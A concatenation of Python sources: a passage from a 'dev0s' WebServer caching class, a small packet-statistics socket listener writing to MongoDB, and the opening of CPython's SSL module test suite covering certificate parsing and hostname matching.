command = [str(defaults.vars.executable), f"{SOURCE_PATH}classes/database/fork.py", "--serialized", f"'{serialized}'", "--dev0s-webserver-tag", self.tag]
# note: "2>" / "/dev/null" would be passed to Popen as literal arguments rather than a shell
# redirection, so silence stderr through Popen directly when log_level < 0.
stderr = subprocess.DEVNULL if self.log_level < 0 else None
p = subprocess.Popen(command, stderr=stderr)
success = False
for i in range(int(timeout/sleeptime)):
if self.running:
success = True
break
time.sleep(sleeptime)
if success:
return _response_.success(f"Successfully started the {self.id}.")
else:
return _response_.error(f"Failed to start the {self.id}.")
def stop(self):
if not self.running:
return _response_.success(f"{self.__traceback__(function='stop')}: The {self.id} is not running.")
processes = code.processes(includes=f"--dev0s-webserver-tag {self.tag}")
if not processes.success: return processes
if len(processes.processes) <= 1:
return _response_.error(f"Unable to find the pid of the {self.id}.")
for pid, info in processes.processes.items():
if info["process"] not in ["grep"]:
response = code.kill(pid=pid)
if not response.success: return response
return _response_.error(f"Successfully stopped the {self.id}.")
#
# threading functions.
def start_thread(self, thread, group="daemons", id=None):
response = self.set(group=group, id=id, data=thread)
if not response.success: return response
response = thread.start()
if response != None:
try: success = bool(response["success"])
except: success = True
if not success: return response
try:
id = thread.id
except:
id = str(thread)
return _response_.success(f"Successfully started [{id}].")
def get_thread(self, group="daemons", id=None):
response = self.get(group=group, id=id)
if not response.success:
if "There is no data cached for" in response.error:
return _response_.error(f"There is no thread cached for (group: {group}), (id: {id}).")
else: return response
thread = response.data
return _response_.success(f"Successfully retrieved thread [{thread}].", {
"thread":thread,
})
#
# properties.
@property
def token(self):
if random.randrange(1, 100) <= 5:
response = self.system_cache.save(path=f"{self.id}/token", data=String().generate(length=64, digits=True, capitalize=True), format="str")
if not response.success: response.crash()
response = self.system_cache.load(path=f"{self.id}/token", format="str")
if response.success and "None" not in str(response.data):
return response.data
else:
response = self.system_cache.save(path=f"{self.id}/token", data=String().generate(length=64, digits=True, capitalize=True), format="str")
if not response.success: response.crash()
response = self.system_cache.load(path=f"{self.id}/token", format="str")
if response.success and "None" not in str(response.data):
return response.data
else:
if response.error == None:
response.error = f"Failed to create a token for webserver [{self.id}] ({self.system_cache.join(self.id+'/token')})."
response.crash()
@property
def running(self):
return self.__running__()
def __running__(self, timeout=3):
encoded = _requests_.encode({
"token":self.token,
"cache":self.system_cache.path,
"cache_id":self.id,
})
try:
__requests__.get(f'http://{self.host}:{self.port}/active?{encoded}', timeout=timeout)
return True
except __requests__.exceptions.ConnectionError:
return False
#
# system functions.
def __serialize__(self, dictionary, safe=False):
if isinstance(dictionary, (Dictionary, dict)):
new = {}
for key, value in dictionary.items():
if value in ["False", "false"]: new[key] = False
elif value in ["True", "true"]: new[key] = True
elif value in ["None", "none", "null", "nan"]: new[key] = None
elif isinstance(value, (dict, Dictionary, list, Array)):
new[key] = self.__serialize__(value, safe=safe)
elif isinstance(value, object):
if not safe:
new[key] = value
else:
try:
int(value)
new[key] = int(value)
except:
new[key] = value
return new
if isinstance(dictionary, (Array, list)):
new = []
for value in dictionary:
if value in ["False", "false"]: new.append(False)
elif value in ["True", "true"]: new.append(True)
elif value in ["None", "none", "null", "nan"]: new.append(None)
elif isinstance(value, (dict, Dictionary, list, Array)):
new.append(self.__serialize__(value, safe=safe))
elif isinstance(value, object):
if not safe:
new.append(value)
else:
try:
int(value)
new.append(int(value))
except:
new.append(value)
return new
else: raise ValueError(f"Parameter [dictionary] requires to be a [dict, Dictionary, list, Array], not [{dictionary.__class__.__name__}].")
#
#
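# Usage sketch for the WebServer class above (illustrative only; the id, group and data values
# are examples): fork() starts the flask cache in a separate process, set()/get() talk to it
# over HTTP, and the cached value comes back in the response's "data" field.
#
#   ws = WebServer(id="example-webserver", host="127.0.0.1", port=52379)
#   ws.fork()
#   ws.set(group="sessions", id="user-1", data="some value")
#   response = ws.get(group="sessions", id="user-1")
#   ws.stop()
#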
|
statistics.py
|
#!/usr/bin/env python
import time
import os
import sys
import socket
import ast
import threading
from utils import *
socket_file = '/var/run/statistics_socket'
# Make sure the socket does not already exist
try:
os.unlink(socket_file)
except OSError:
if os.path.exists(socket_file):
raise
class Statistics():
def __init__(self):
self.conn, self.db = connect('remote')
self.results = self.conn['results']['results_stats']
# Collections
self.coll_rules = self.db['rules']
self.coll_vnf = self.db['vnf']
self.socket_file = socket_file
port = self.coll_vnf.find_one({'_id': 'Statistics'}, {'port': 1})['port']
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.bind(self.socket_file)
self.socket.listen(1)
def create_results(self, rule):
"""
Create rule results
"""
doc = {'_id': rule}
doc['Total Packets'] = 0
doc['Total Bytes'] = 0
self.results.insert(doc)
return doc
def update_document(self, rule_id, pkt):
"""
Update a document
"""
results[rule_id]['Total Packets'] += 1
results[rule_id]['Total Bytes'] += pkt['Size']
def update_data(self):
"""
Write to database in-memory results
"""
conn, db = connect('remote')
coll_results = conn['results']['results_stats']
while True:
time.sleep(1)
for rule_id, node_result in results.iteritems():
coll_results.update_one(
{'_id': rule_id},
{
'$set': {
'Total Packets': node_result['Total Packets'],
'Total Bytes': node_result['Total Bytes']
}
})
global results
results = {}
statistic = Statistics()
connection = statistic.socket.accept()[0]
updater = threading.Thread(target=statistic.update_data)
updater.start()
while True:
size = connection.recv(3)
data = connection.recv(int(size))
data = data.replace("'", "\"")
pkt = ast.literal_eval(data)
for rule_id in pkt['rules']:
if not statistic.results.count({'_id': rule_id}):
results[rule_id] = statistic.create_results(rule_id)
statistic.update_document(rule_id, pkt)
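#
# Client-side sketch of the wire protocol handled above (illustrative; the rule ids and sizes
# are made up): each message is a 3-byte ASCII length prefix followed by that many bytes of a
# dict literal containing at least 'rules' and 'Size' keys.
#
#   import socket
#   pkt = {'rules': ['rule-1'], 'Size': 1500}
#   payload = str(pkt)
#   s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#   s.connect('/var/run/statistics_socket')
#   s.send('%03d' % len(payload))
#   s.send(payload)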
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
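# A minimal usage sketch for the helper above (the socket here is illustrative and not
# connected to a server):
#
#   sock = socket.socket(socket.AF_INET)
#   ss = test_wrap_socket(sock, cert_reqs=ssl.CERT_REQUIRED, ca_certs=SIGNING_CA)
#   # ss is an SSLSocket created from a context configured by the keyword arguments.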
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
